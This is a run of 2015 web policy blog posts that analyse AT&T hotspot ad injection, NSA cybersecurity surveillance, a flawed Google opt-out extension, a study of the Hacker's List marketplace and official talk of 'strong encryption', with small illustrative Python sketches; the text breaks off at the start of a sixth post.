Web Policy

AT&T Hotspots: Now with Advertising Injection

jonathan — Tue, 25 Aug 2015 18:21:06 +0000

While traveling through Dulles Airport last week, I noticed an Internet oddity. The nearby AT&T hotspot was fairly fast—that was a pleasant surprise.

But the web had sprouted ads. Lots of them, in places they didn’t belong.

Last I checked, Stanford doesn’t hawk fashion accessories or telecom service.¹ And it definitely doesn’t run obnoxious ads that compel you to wait.

Some ad-supported websites, like the Wall Street Journal, were also emblazoned with extra marketing material.

Same goes for certain federal government websites.

Curious, and waiting on a delayed flight, I started poking through web source. It took little time to spot the culprit: AT&T’s wifi hotspot was tampering with HTTP traffic.

The ad injection platform appears to be a service from RaGaPa, a small startup. Their video pitch features “MONETIZE YOUR NETWORK” over cascading dollar signs. (Seriously.)

When an HTML page loads over HTTP, the hotspot makes three edits. (HTTPS traffic is immune, since it’s end-to-end secure.)

First, the hotspot adds an advertising stylesheet.

Next, it injects a backup advertisement, in case a browser doesn’t support JavaScript. It appears that the hotspot intercepts /ragapa URLs and resolves them to advertising images.²

Finally, the hotspot adds a pair of scripts for controlling advertisement loading and display.

Those scripts, in turn, import advertising content from additional third-party providers.
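One way to confirm this kind of tampering is to compare the resources a page references in a trusted copy (for example, one fetched over HTTPS) against the copy received over plain HTTP. The following is a minimal Python sketch under that assumption. The sample markup, the `ads.example` host, and the `/ragapa/backup.png` file name are hypothetical stand-ins, not the markup the hotspot actually served.

```python
from html.parser import HTMLParser


class ResourceCollector(HTMLParser):
    """Collects the URLs of stylesheets, scripts, and images in a page."""

    # Map each tag of interest to the attribute that holds its URL.
    URL_ATTRS = {"link": "href", "script": "src", "img": "src"}

    def __init__(self):
        super().__init__()
        self.resources = set()

    def handle_starttag(self, tag, attrs):
        wanted = self.URL_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.resources.add((tag, value))


def collect_resources(html):
    """Parse an HTML string and return its set of (tag, url) pairs."""
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    return parser.resources


def injected_resources(trusted_html, observed_html):
    """Return resources present in the observed copy but not the trusted one."""
    extra = collect_resources(observed_html) - collect_resources(trusted_html)
    return sorted(extra)


# Hypothetical pages: the observed copy carries an extra stylesheet,
# a <noscript> fallback image, and an extra script.
TRUSTED = """<html><head><link rel="stylesheet" href="/site.css"></head>
<body><img src="/logo.png"></body></html>"""

OBSERVED = """<html><head><link rel="stylesheet" href="/site.css">
<link rel="stylesheet" href="http://ads.example/inject.css"></head>
<body><img src="/logo.png">
<noscript><img src="/ragapa/backup.png"></noscript>
<script src="http://ads.example/loader.js"></script></body></html>"""

if __name__ == "__main__":
    for tag, url in injected_resources(TRUSTED, OBSERVED):
        print(tag, url)
```

A difference between the two copies is only a hint, since dynamic pages can legitimately vary between requests. Unfamiliar hosts or paths in the extra entries are what merit a closer look.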

AT&T has an (understandable) incentive to seek consumer-side income from its free wifi service, but this model of advertising injection is particularly unsavory. Among other drawbacks: It exposes much of the user’s browsing activity to an undisclosed and untrusted business. It clutters the user’s web browsing experience. It tarnishes carefully crafted online brands and content, especially because the ads are not clearly marked as part of the hotspot service.³ And it introduces security and breakage risks, since website developers generally don’t plan for extra scripts and layout elements.

Recent experience with advertisement injection is telling. When a Marriott property was spotted deploying similar technology, it immediately reversed course. The handful of U.S. ISPs that have dabbled in advertising injection appear to have backed off. Earlier this year, Google conducted a comprehensive study of advertising injection, and yanked nearly 200 misleading extensions from the Chrome Web Store. The closest common practice, to my knowledge, is injecting hotspot status indicators—and that’s also proven extraordinarily controversial.

The legality of hotspot advertising injection is a messy subject. There are a number of colorable arguments against it, including under the FCC’s net neutrality rules,⁴ the FTC’s unfairness and deception authorities (and state parallels),⁵ wiretapping statutes,⁶ pen register statutes, tortious interference, copyright, and more. It certainly doesn’t help AT&T and RaGaPa that the ads aren’t labeled as associated with the hotspot, and that AT&T’s wifi terms of service are silent about advertising injection.⁷

Regardless of where the law is, AT&T should immediately stop this practice. And if websites needed (yet another) reason to adopt HTTPS, here’s a good one.

I write shorter stuff at @jonathanmayer.

1. Since I imagine some readers will be pedantic—yes, the Stanford bookstore does sell a small selection of jewelry, and yes, Stanford does provide on-campus Internet service.

2. I didn’t have time to test this feature before I boarded my flight. It seems a particularly poor technical design, since it relies on avoiding URL path collisions and it misrepresents the source of content.

3. While the most frequent advertisements appeared to be related to AT&T services, they were ordinary banner ads for residential offerings, not marked in any way as associated with the hotspot. And, at any rate, many ads had nothing to do with AT&T.

4. In precise regulatory terminology, AT&T’s hotspot network is (arguably) a “broadband Internet access service,” and is (also arguably) “unreasonably interfering with” or “unreasonably disadvantaging” consumer or website connectivity.

5. The FTC’s ability to enforce against AT&T depends on the FCC’s net neutrality rules. If the free component of AT&T’s hotspot network is a covered “broadband Internet access service,” then the FTC Act’s common carrier exception prevents enforcement. The FTC could still bring an action against RaGaPa.

6. According to RaGaPa’s product sheet, one possible configuration involves redirecting all user traffic through RaGaPa’s servers. That would raise particularly thorny wiretapping issues. I didn’t spot the provision until after departing Dulles, unfortunately, so I didn’t test whether AT&T was re-routing customer traffic.

7. The closest passage in AT&T’s wifi terms of service is:

We may also enable certain technologies intended to improve your experience, maintain network security, and/or optimize network utilization that may generate records regarding the websites you visit and search terms you enter while using the Service.

AT&T might argue that ad injection “improve[s] your experience.” Good luck with that.

The NSA’s Domestic Cybersecurity Surveillance

jonathan — Thu, 04 Jun 2015 15:10:23 +0000

Earlier today, the New York Times reported that the National Security Agency has secretly expanded its role in domestic cybersecurity. In short, the NSA believes it has authority to operate a warrantless, signature-based intrusion detection system—on the Internet backbone.¹

Owing to the program’s technical and legal intricacies, the Times-ProPublica team sought my explanation of related primary documents.² I have high confidence in the report’s factual accuracy.³

Since this morning’s coverage is calibrated for a general audience, I’d like to provide some additional detail. I’d also like to explain why, in my view, the news is a game-changer for information sharing legislation.

The Facts

Despite nearly two years of disclosures, the NSA’s domestic Internet surveillance remains shrouded in secrecy. To borrow Donald Rumsfeld’s infamous turn of phrase, it remains one of the greatest known unknowns surrounding the agency.

The following facts are already public.

The NSA maintains “upstream” interception equipment at many points on the global telecommunications backbone.
One of the primary legal authorities for domestic upstream surveillance is Section 702 of the FISA Amendments Act (FAA).
The Foreign Intelligence Surveillance Court (FISC) has authorized warrantless FAA surveillance in connection with foreign governments, counterterrorism, and counterproliferation. Each of these topics has an associated “certification,” establishing procedures for targeting and minimization.
The NSA can use FAA upstream Internet surveillance to collect⁴ traffic that is “to,” “from,” or “about”⁵ a “selector.” Prior disclosures have emphasized email addresses as FAA upstream Internet selectors.
In order for a selector to be eligible for FAA surveillance, it must be used by a foreign person or entity outside the United States.
Intelligence communityᵃ analysts can search FAA surveillance data for information involving Americans. Senator Wyden has been a particularly persistent critic of these queries, dubbing them “backdoor searches.”

The primary documents associated with today’s report confirm the following additional facts.⁶

The NSA can use FAA upstream Internet surveillance for cybersecurity purposes, so long as there is a nexus with one of the three prior certifications. The most common scenario is where the NSA can attribute a cybersecurity threat to another nation, enabling it to rely on the foreign government certification.
Internet protocol (IP) addresses and ranges are eligible as FAA upstream surveillance selectors. The Department of Justice approved this practice in July 2012.⁷
Cybersecurity threat signatures are also eligible as FAA upstream surveillance selectors. This adds a de facto fourth category of FAA interceptions, since a threat signature cannot reasonably be categorized as “to,” “from,” or “about” a particular address.⁸ DOJ appears to have approved the practice in May 2012.
The NSA has acted upon the above legal interpretations. The primary documents make reference to particular FAA cybersecurity operations. Those operations relied on the foreign government certification, and they used IP addresses as selectors.
Since 2012, if not earlier, the NSA has prioritized obtaining an FAA “cyber threat” certification. From the agency’s perspective, a cyber certification has two desirable properties. First, it would eliminate the nexus requirement. The NSA would be able to intercept traffic associated with a cybersecurity threat, regardless of whether the threat originates with a foreign government. Second, a cyber certification would codify procedures for IP address and signature targeting. The present status of the cyber certification is not apparent; it may have been approved, have been bundled into another certification, still be in progress, or have been set aside.⁹ It is also not apparent how FAA’s foreignness requirement would be implemented under the certification.¹⁰
When data is exfiltrated in the course of an attack, it often includes sensitive information about Americans. The NSA believes that this exfiltrated data should be considered “incidental” collection, rendering it eligible for backdoor searches. Put differently: when a data breach occurs on American soil, and the NSA intercepts stolen data about Americans, it believes it can use that data for intelligence purposes.
The NSA collaborates with the Department of Homeland Security and the Federal Bureau of Investigation on cybersecurity matters. It receives and shares cybersecurity threat signatures with both agencies. When the NSA wishes to disclose a threat signature to the private sector, it usually routes that information through DHS or the FBI. The NSA is not attributed as the source of the threat signature.
The FBI does not have its own national security surveillance equipment installed on the domestic Internet backbone. It can borrow the NSA’s equipment, though, by having the NSA execute surveillance on its behalf.

In my view, the key takeaway is this: for over a decade, there has been a public policy debate about what role the NSA should play in domestic cybersecurity. The debate has largely presupposed that the NSA’s domestic authority is narrowly circumscribed, and that DHS and DOJ play a far greater role. Today, we learn that assumption is incorrect. The NSA already asserts broad domestic cybersecurity powers. Recognizing the scope of the NSA’s authority is particularly critical for pending legislation.

Information Sharing

In recent years, domestic cybersecurity legislation has focused on information sharing. The notion is that private businesses are not swapping vital threat information, owing to potential legal liability. (Like the overwhelming majority of computer security professionals, I believe that premise is inaccurate.)

There are at least five different information sharing bills presently before Congress. CISPA passed the House in 2012; it was widely condemned by an online grassroots effort, and it ultimately drew a veto threat from the White House. This year, both PCNA and NCPAA have cleared the House, and the Senate is likely to take up information sharing soon.

The conventional privacy criticism of information sharing legislation goes, roughly, like this. Private online activity is protected by a longstanding legal framework, including the Wiretap Act and the Stored Communications Act. Information sharing legislation would drill gaping, ill-defined holes in those safeguards. Businesses would increasingly share highly sensitive information with the government, which could in turn use and share that information for law enforcement and other purposes.¹¹ In Senator Wyden’s memorable phrasing, information sharing legislation is “a surveillance bill by any other name.”

The consistent response to this line of criticism has been to emphasize that information sharing legislation is not a grant of surveillance authority. When PCNA was under consideration, for instance, Representative Schiff insisted: “[L]est anyone be confused, this bill makes clear in black and white legislative text that nothing authorizes government surveillance in this act. Nothing.”

That perspective is only half true. PCNA does explicitly decline to grant new cybersecurity surveillance powers, and NCPAA has a roughly parallel provision.

But the NSA already has sweeping cybersecurity surveillance authority. It doesn’t need a new statutory grant of power. By feeding threat signatures to the NSA, information sharing would activate the agency’s existing authority.

This understanding of the NSA’s domestic cybersecurity authority leads to, in my view, a more persuasive set of privacy objections. Information sharing legislation would create a concerning surveillance dividend for the agency.

Because this flow of information is indirect, it prevents businesses from acting as privacy gatekeepers. Even if firms carefully screen personal information out of their threat reports, the NSA can nevertheless intercept that information on the Internet backbone.

Furthermore, this flow of information greatly magnifies the scale of privacy impact associated with information sharing. Here’s an entirely realistic scenario: imagine that a business detects a handful of bots on its network. The business reports a signature to DHS, which hands it off to the NSA. The NSA, in turn, scans backbone traffic using that signature; it collects exfiltrated data from tens of thousands of bots. The agency can then use and share that data.¹² What began as a tiny report is magnified to Internet scale.
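To make the magnification concrete, here is a toy Python model of signature matching. It assumes, loosely following the description of “about” collection in the notes to this post, that a flow is collected when its payload contains the signature string and at least one endpoint is outside the United States. The `Flow` type, the country-code fields, and the `BOTNET-BEACON` signature are hypothetical illustrations; nothing here reflects an actual agency system.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    """A simplified traffic flow: endpoint countries plus raw payload."""
    src_country: str
    dst_country: str
    payload: bytes


def matches(flow, signature, home="US"):
    """True when the flow is one-end foreign and contains the signature."""
    one_end_foreign = flow.src_country != home or flow.dst_country != home
    return one_end_foreign and signature in flow.payload


def scan(flows, signature):
    """Return every flow that the signature selects."""
    return [flow for flow in flows if matches(flow, signature)]


# Hypothetical signature reported by a single business.
SIGNATURE = b"BOTNET-BEACON"

# Hypothetical backbone traffic from many unrelated networks.
SAMPLE_FLOWS = [
    Flow("US", "RU", b"hdr BOTNET-BEACON id=1 stolen-records"),
    Flow("DE", "US", b"BOTNET-BEACON id=2"),
    Flow("US", "US", b"BOTNET-BEACON id=3"),   # purely domestic
    Flow("US", "FR", b"GET /index.html"),      # no signature
]

if __name__ == "__main__":
    print(len(scan(SAMPLE_FLOWS, SIGNATURE)), "flows selected")
```

The business that reported the signature never saw most of these flows. The single reported string is what selects them, which is why screening personal information out of the original report does little to limit what is ultimately collected.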

Sometimes I write shorter stuff at @jonathanmayer.

This was a personal project; it did not make use of Stanford University resources.

1. While I’m not a fan of the “cyber” prefix, I believe it is important to this particular piece. Apologies.

Also, I focus here on “upstream” surveillance of Internet traffic. Many of the same observations apply to stored data, under the PRISM program.

2. Accepting was, candidly, a very difficult decision. I have mixed views on large-scale government leaks, and I appreciate the legitimacy and importance of keeping intelligence operations classified. I participated in this project because it centers on secret interpretations of United States law, and because it is highly relevant to ongoing legislative and policy debates.

I recognize that friends and colleagues in the intelligence community may disagree with my decision to participate in this project. I greatly value those relationships, and I sincerely hope that my participation will not impair them. I would also emphasize that both the Times report and this blog post deliberately omit specific surveillance targets, resulting intelligence, and agency personnel.

3. Early coverage of NSA programs was, unfortunately, riddled with legal and technical misunderstandings. Computer security and privacy journalism is markedly better when it incorporates advance review by lawyers and computer scientists with relevant expertise.

4. The scope of what information the NSA temporarily buffers remains deeply ambiguous. Some observers believe that the agency temporarily retains (but does not “collect,” within the legal meaning) all one-end foreign Internet traffic.

5. The technical implementation of “about” collection appears to involve matching strings in traffic flows, plus filtering for at least one IP address outside the United States.

6. Since the Snowden archive ends in mid-2013, some of these facts may be outdated.

7. It is not apparent whether this was the first instance of IP address selectors, or IP address selectors specifically for cybersecurity. It is also not apparent whether the NSA sought the FISC’s advance permission for using IP address or signature selectors.

Prior reports had suggested IP-based targeting was allowed, and it was widely assumed to be permissible among surveillance scholars. It certainly comes as little surprise.

8. In precise surveillance law lingo, signature selectors are not “to,” “from,” or “about” a specific “communications facility.”

9. After reviewing recent public statements by a number of intelligence officials, I do not believe there is particularly strong evidence for or against the existence of a cyber certification.

10. Even modestly sophisticated intrusions are, at least at first, difficult to attribute. In the absence of further information, the NSA would presumably assume foreignness. And even if the agency implemented a technical foreignness requirement (e.g. a one-end foreign IP filter), many run-of-the-mill attacks are either based outside the United States or bounce through a proxy outside the United States.

11. Subject to the usual Section 702 minimization procedures.

12. Again, subject to minimization procedures.

a. Thanks to Charlie Savage for suggesting a clarification. The statement was literally true—NSA analysts can conduct backdoor searches under FAA. Since this piece is focused on upstream surveillance, and since the rules for backdoor searches are nuanced and ambiguous, here’s some further detail.

Present NSA policy appears to voluntarily limit U.S. person backdoor queries to stored communications (PRISM). FBI and CIA analysts can also conduct U.S. person backdoor queries on PRISM data, and may be able to request backdoor queries on FAA upstream data; public disclosures are ambiguous on the issue.

(Aside 1: while these are the rules for U.S. person backdoor queries, they are not always followed. According to the NSA’s reports to the President’s Intelligence Oversight Board, for instance, noncompliant queries do occur.)

(Aside 2: this post is focused on the FISA Amendments Act. There are other legal structures for cybersecurity surveillance, including FISA Title I and Executive Order 12333. The backdoor query rules for those upstream and cloud service collections may differ.)

This much is certain about FAA cybersecurity surveillance: If the NSA snoops on hackers as they move stolen data over the Internet backbone, agency analysts can sift through that information—other than with explicit U.S. person queries. If the NSA, FBI, or CIA snoops on hackers as they move stolen data through a cloud service, such as Dropbox or Gmail, analysts can sift through that information—including with explicit U.S. person queries.

The Efficacy of Google’s Privacy Extension

jonathan — Mon, 01 Jun 2015 17:48:42 +0000

Over four years ago, Google launched a Chrome privacy extension. Keep My Opt-Outs arrived with a media splash, and it presently has over 400,000 users worldwide.¹

It’s a top result on the Chrome Web Store,² and it’s even endorsed by a faux celebrity.

Unfortunately, the Keep My Opt-Outs extension isn’t nearly as effective as Google claims. It hasn’t been updated for years, resulting in only half of the promised coverage. Keep My Opt-Outs also doesn’t work in Chrome’s private browsing mode, despite the user’s explicit permission.

If you’re currently running Keep My Opt-Outs, I’d encourage switching to Disconnect or Privacy Badger.³ Adblock, Adblock Plus, and Ghostery are also excellent privacy tools, when configured properly.

In this post, I’ll explain why Google emphasized the Keep My Opt-Outs extension, how the code works, and what went awry.

History

Google was in a bind.⁴ It was late 2010, and consumer web tracking had come under extraordinary pressure. The Federal Trade Commission issued a report calling for easy consumer choice, and legislators were readying responsive bills. The Wall Street Journal was in the midst of a blistering investigative series. Microsoft had introduced new blocking features for Internet Explorer. An eclectic group of academics, advocates, and Mozilla engineers were coalescing around “DNT: 1,” a Do Not Track HTTP header.

Google had to do something. A contingent of Chrome engineers favored the Do Not Track approach; it was easy to implement, easy to use, and on a path to standardization.⁵ Google’s advertising team was opposed to Do Not Track, and wanted to stick with the industry’s existing opt-out cookies. Externally, it expressed concern that Do Not Track was not sufficiently defined. Internally, it worried that Do Not Track might become too protective or too popular. (Opt-out cookies only prevent advertising personalization, not tracking, and are rarely used.) The policy group, for its part, was deeply divided. Making matters even more complicated, none of these three factions had decision-making authority.

And so Google arrived at a stopgap compromise. It would feature a Chrome extension that simply persisted and updated opt-out cookies. For the Chrome team, it was easy to build, involved no changes to the browser, and provided users with a real (albeit small) privacy gain. For the advertising team, it was essentially equivalent to opt-out cookies. And for the policy team, it was a useful prop when interacting with Washington and media critics.

That alignment of interests resulted in a prominent rollout.⁶ Google featured the extension in written submissions to the Federal Trade Commission and the Commerce Department.

Design

The architecture of Keep My Opt-Outs is straightforward, and essentially equivalent to prior opt-out extensions. If I were teaching an undergraduate computer science course, it would make for a nice project. (Google still filed for a patent.)

The extension includes a list of advertising firms and associated opt-out cookies. When initialized, Keep My Opt-Outs sets those cookies. It then monitors the browser’s cookie store for changes. If any of the cookies gets modified or deleted, Keep My Opt-Outs simply reverts the change. That’s all.
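The set-then-revert loop described above can be sketched in a few lines. This is an illustrative Python model, not Google's code: the real extension is written against Chrome's extension APIs, and the `CookieStore` class, the `OptOutKeeper` class, and the example domain and cookie values are all hypothetical.

```python
class CookieStore:
    """Toy stand-in for a browser cookie store with change notifications."""

    def __init__(self):
        self._cookies = {}
        self._listeners = []

    def add_listener(self, callback):
        self._listeners.append(callback)

    def get(self, domain, name):
        return self._cookies.get((domain, name))

    def set(self, domain, name, value):
        self._cookies[(domain, name)] = value
        self._notify(domain, name)

    def delete(self, domain, name):
        self._cookies.pop((domain, name), None)
        self._notify(domain, name)

    def _notify(self, domain, name):
        # Copy the listener list so callbacks may safely trigger new changes.
        for callback in list(self._listeners):
            callback(domain, name)


class OptOutKeeper:
    """Sets every listed opt-out cookie, then reverts any later change."""

    def __init__(self, store, opt_outs):
        self.store = store
        self.opt_outs = dict(opt_outs)
        # Step 1: set each opt-out cookie from the bundled list.
        for (domain, name), value in self.opt_outs.items():
            store.set(domain, name, value)
        # Step 2: watch the store for modifications and deletions.
        store.add_listener(self._on_change)

    def _on_change(self, domain, name):
        expected = self.opt_outs.get((domain, name))
        if expected is None:
            return  # Not on the list, so not covered.
        # Step 3: restore the cookie if it was altered or removed.
        if self.store.get(domain, name) != expected:
            self.store.set(domain, name, expected)


if __name__ == "__main__":
    store = CookieStore()
    OptOutKeeper(store, {("ads.example", "optout"): "1"})
    store.delete("ads.example", "optout")
    print(store.get("ads.example", "optout"))
```

Note that the keeper only ever touches cookies that appear in its bundled list. Anything else in the store passes through unchanged.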

Shortcomings

Keep My Opt-Outs is only as effective as its internal cookie list. If a business isn’t included, it isn’t covered by the extension. Given how quickly the online advertising ecosystem has grown, regular updates are a must.

The extension doesn’t include a special mechanism for updating its cookie list. In order to revise which businesses are included, Google has to release a new version.

Over the past several years, Google appears to have… forgotten. The latest revision of the cookie list was in October 2011.⁷

That’s a huge blow to the extension’s efficacy. It only limits personalized advertising for about half of the businesses that offer a self-regulatory opt-out setting. Several large industry players, including Facebook, aren’t covered.

What’s more, if a user enables Chrome’s private browsing mode—to protect their privacy further—they lose the extension’s opt-out protection.⁸

That’s even though a user has explicitly authorized Keep My Opt-Outs in private browsing mode.

Even Google’s own opt-out preference stops working properly.

The reason is that Keep My Opt-Outs doesn’t account for the separate private browsing cookie store. It doesn’t initialize all the opt-out cookies in its list, and it doesn’t properly handle missing opt-out cookies.⁹
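The gap can be modeled with two separate cookie stores. The Python sketch below is a simplified illustration, not the extension's code: the store names, the `OPT_OUTS` entry, and the `initialize_all` remedy are assumptions made for the example.

```python
# Hypothetical opt-out list with a single entry.
OPT_OUTS = {("ads.example", "optout"): "1"}


def initialize_main_only(stores):
    """Models the reported behavior: only the main store is seeded at load."""
    stores["main"].update(OPT_OUTS)


def initialize_all(stores):
    """One possible remedy (an assumption): seed every visible cookie store."""
    for cookies in stores.values():
        cookies.update(OPT_OUTS)


def missing_opt_outs(cookies):
    """List the opt-out cookies that a given store lacks or has altered."""
    return sorted(
        key for key, value in OPT_OUTS.items() if cookies.get(key) != value
    )


if __name__ == "__main__":
    stores = {"main": {}, "private": {}}
    initialize_main_only(stores)
    print("private store missing:", missing_opt_outs(stores["private"]))
    initialize_all(stores)
    print("private store missing:", missing_opt_outs(stores["private"]))
```

Because the private store starts out without any opt-out cookies, there is never an existing opt-out cookie there to be modified. Repair logic that fires only on changes to existing opt-out cookies therefore never runs for that store.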

Parting Thoughts

There’s an undeniable irony here. In the interest of avoiding Federal Trade Commission action, Google appears to have violated the FTC Act. According to Google, Keep My Opt-Outs covers “all companies that offer opt-outs through the industry self-regulation programs.” And, “as more companies adopt the industry privacy standards . . . their opt-outs will be automatically added to Keep My Opt-Outs.” Those statements are untrue, exposing Google to consumer deception liability.

As for privacy technology, the lesson of Keep My Opt-Outs is that future-proofing is essential.¹⁰ The web changes quickly. Any consumer control technology—and promises surrounding that technology—must be built to last.

I write shorter stuff at @jonathanmayer.

1. This post is focused on the Chrome extension, since it is far and away the most prominent version of Keep My Opt-Outs. There are also Firefox and Internet Explorer variants; according to Google’s download statistics, they have very few users.

2. In informal tests, the extension appeared as a top-three result for “advertising” and “opt out.”

3. Disclosure: I’ve helped out with the Privacy Badger project. I don’t recommend the advertising industry’s Protect My Choices extension since it doesn’t stop tracking, just personalized advertising. Also, Protect My Choices is derived from Keep My Opt-Outs, and has the same updating issue. The extension’s list of opt-out cookies appears to have last been revised in July 2014.

4. The above narrative is drawn from conversations with a number of Google employees, during the height of Do Not Track negotiations. It’s an attempt to capture the zeitgeist and the aggregate views of particular teams. Individual employees, of course, held diverse perspectives. I’d like to particularly emphasize that I have no insight into what the author of Keep My Opt-Outs was thinking. Past comments reflect that he believed in the privacy value of the extension, and I have no reason to doubt his sincerity.

5. In one memorable (and odd) conversation, a couple of Chrome developers bragged about how few lines of code were required.

6. It’s entirely possible that the extension would have existed regardless of external pressures and internal politics. This much is certain: the extent of fanfare surrounding Keep My Opt-Outs was a direct result of those phenomena.

7. The following figure is drawn from Internet Archive data. Not all Digital Advertising Alliance member companies offer an opt-out setting, resulting in the discrepancy between these counts and counts on opt-out webpages.

8. Private browsing mode does not frustrate tracking within a private browsing session. It also doesn’t impact tracking with stateless (“fingerprinting”) technologies.

9. Specifically, Keep My Opt-Outs iterates only the main cookie store, when the extension loads. While the extension does include some logic for handling altered or deleted opt-out cookies, that logic is only triggered by a modification to a valid opt-out cookie.

10. The GitHub page for Keep My Opt-Outs suggests that Google is planning to retire the extension. While that may be a sensible product direction, Google’s representations oblige it to maintain the extension until its retirement.

Exploring a Hacker Marketplace

jonathan — Thu, 21 May 2015 17:02:18 +0000

In the sharing economy, you can hire a one-off driver (Uber), courier (Postmates), grocery shopper (Instacart), housekeeper (Homejoy), or just about any other variety of henchman (TaskRabbit). So, what about hiring a hacker?

That’s the premise of Hacker’s List, a website launched in November. Anyone can post or bid on a hacking project. Hacker’s List arranges secure communication and payment escrow.

An online black market is, to be sure, nothing new. The rise and fall of the Silk Road received extensive media coverage.

What’s unusual about Hacker’s List is that it, purportedly, isn’t a black market. The website is public, projects and bids are open (albeit pseudonymous), and the owner has identified himself. (He runs a small security firm in Denver.) Hacker’s List was even featured on the front page of the New York Times.

Out of curiosity, I decided to leverage this openness. Who tries to hire a hacker? Is the website as popular as its owner claims? Most importantly, does the website facilitate illegal transactions, or solely white hat hacking?

To answer these questions—and, admittedly, to procrastinate on my dissertation—I cobbled together a crawler. You can find the source on GitHub, and the crawl data on Google Docs.

Here’s the short version: most requests are unsophisticated and unlawful, very few deals are actually struck, and most completed projects appear to be criminal.

Who Tries to Hire a Hacker?

A majority of requests¹ involve compromising cloud service accounts. The most common targets are Facebook (expressly referenced in 23% of projects) and Google (14%). Motives vary, and often involve a business dispute or jilted romance. (How cliché.)

The second most common scenario (8%) arises from academia. There is, apparently, enormous demand for artificially improving grades — especially at the undergraduate level. Targets include the University of California, UConn, and the City College of New York.

A final fact pattern that bears mention is altering search results. About 3% of projects involve burying some embarrassing tidbit, essentially an ersatz Right to be Forgotten.

These observations come with an important caveat: the requests on Hacker’s List are overwhelmingly cheap and unsophisticated. The median project is priced from $200 to $300, and many descriptions reflect technical misunderstanding. Hacker’s List certainly isn’t representative of the market for high-end, bespoke attacks. But the site does seem a fair cross-section of the hacks that ordinary Internet users might seek out.

As an aside, many users on Hacker’s List are trivially identifiable. Some submissions explicitly include a name, contact information, or a street address. Also, owing to the design of the site’s social integration, I was able to match 25% of active accounts to a Facebook profile. So much for “discreetly” hiring a hacker.

How Popular Is Hacker’s List?

The owner of Hacker’s List has claimed that the site “exploded” and “went viral.” Visitor traffic certainly shot up following January press coverage.

Actual usage of the site, though, has been lackluster. There are only about two to three projects posted per hour, and month-to-month growth is slim. By any usual startup benchmark, Hacker’s List is hardly a sensation.²

What’s more, the overwhelming majority of hacking requests go nowhere. Fewer than 0.1% of projects advance to an actual hack.³

The owner of Hacker’s List told the New York Times last week that over 250 jobs have been completed. That claim is not consistent with the site’s own data, which includes just 21 finished tasks.

Money does appear to change hands on Hacker’s List, to be clear. It’s just… not for hacking. Rather, you have to pay the site $3 to bid on a project. And each time you fund your account, there’s a minimum of $10.

Are Completed Projects Legal?

Hacker’s List “is intended for legal and ethical use.” And, according to the owner, “[n]o one is going to complete an illegal project through my website.”

How about “i need hack account facebook of my girlfriend,” completed for $90 in January? Or “need access to a g mail account,” finished for $350 in February? Or “I need [a database hacked] because I need it for doxing,” done for $350 last month?

This much is certain: the overwhelming majority of posts solicit criminal activity, and most of the (few) completed projects appear to be crimes.

Is a Hacker Marketplace Legal?

I’d like to close by taking a step back. Is the very concept of a hacker marketplace compatible with American law?

Websites are, for the most part, not liable for user misdeeds. For nearly two decades, federal law has expressly immunized online services.

A hacker marketplace doesn’t benefit from this immunity, though. There’s an explicit exception for federal criminal offenses. That includes violations of the Computer Fraud and Abuse Act, the federal hacking law.

So, is the operator of a hacker marketplace a criminal? Liability as an accomplice or conspirator is certainly possible. The operator of the Silk Road, for instance, was convicted on a hacking conspiracy charge (among others).

Whether a website owner would be culpable is an exceedingly fact-specific issue. The precise legal question is: did the owner actually intend that crimes be committed, or did they merely know that crimes would be committed?⁴

That’s a very subtle distinction to base a business on. Especially when the potential downside involves years in federal prison.

At best, then, a hacker marketplace exists in a legal limbo.

I write shorter stuff at @jonathanmayer.

1. The results that I report are based on projects and bids that my crawler could access. There appear to be a number of Hacker’s List project IDs that are not associated with a live project page. What happened to those projects, I cannot say. I was able to recover some details via the Hacker’s List revision tracker; as with the live projects, almost all are unlawful.

2. The following figure is based on the last revision date associated with each project. It includes all projects in the revision tracker, many of which do not have a live project page.

3. The data in the following figure is drawn from the Hacker’s List bidding interface, which allows querying for bids by stage of the bidding process. The figure is adapted from the Hacker’s List control panel.

4. If you’d like to learn more about that (hazy) distinction, I recommend the classic case of People v. Lauria.

“We Support Strong Encryption”

jonathan — Tue, 12 May 2015 17:53:19 +0000

A good Washington talking point delivers zero content. A great Washington talking point sounds substantive… while delivering zero content.

In the spirit of honoring greatness, I’d like to call attention to the current White House position on cryptographic backdoors. It received its most public airing from President Obama, in a February 13 interview with RE/CODE.

“I’m a strong believer in strong encryption,” explained the President. “[T]here’s no scenario in which we don’t want really strong encryption.”

President Obama isn’t the only official invoking “strong encryption.” (And strongly, too.) In just about every recent conversation with an administration policymaker, I’ve been subjected to some version of the line.

Here’s the official, pre-canned White House position:

The United States Government firmly supports the development and adoption of strong encryption, which is a key tool to secure commerce and trade, safeguard private information, promote free expression and association, and strengthen cybersecurity.

To a computer security expert, or to a privacy advocate, “strong encryption” might sound like a policy victory. It means encryption that minimizes security risks. It means encryption where the user controls access. It means encryption that doesn’t include a vendor or government backdoor. And so, among colleagues, I’ve heard recent praise of the White House position.

To a law enforcement or intelligence official, though, “strong encryption” means something very different. It means encryption that minimizes security risks, but subject to the constraint that the government can still access data. It means encryption where the user controls access, except where the government is involved. It means encryption that does include a government backdoor, but a well-designed backdoor.¹

That’s why, in a recent House hearing, the FBI’s representative testified that “[c]ompanies must continue to provide strong encryption for their customers.” And that’s why, twenty years ago, at the height of the Crypto Wars, the FBI’s director testified “in favor of strong encryption, robust encryption.”

The White House has, to be fair, distanced itself from law enforcement and intelligence agencies on this issue. When the President said, “I lean probably further on side of strong encryption than some in law enforcement,” his cybersecurity team was sending a deliberate signal. They’re still thinking, and they’re still undecided.

The takeaway is straightforward. Next time you hear an official speak about “strong encryption,” recognize that you’ve heard zero content. And maybe take a moment to bask in the Washington greatness.

1. Several computer security colleagues have suggested that government access and “strong encryption” are fundamentally incompatible, that well-designed backdoors are technically impossible, and that the White House faces an either-or decision. The strongest articulation I’ve heard is that “backdoors break the Internet.” While I imagine that posing a binary choice is a useful rhetorical tool, I believe the issue is more nuanced. There are better and worse designs for government access to a communications or storage system, and in a handful of scenarios, the marginal security risk might be cabined. Backdoors are still a really bad idea, for a long list of reasons, but they don’t necessarily “break the Internet.”

You Can’t Backdoor a Platform

jonathan — Tue, 28 Apr 2015 14:00:53 +0000

According to law enforcement and intelligence agencies, encryption should come with a backdoor. It’s not a new policy position—it dates to the Crypto Wars of the 1990s—but it’s gaining new Beltway currency.

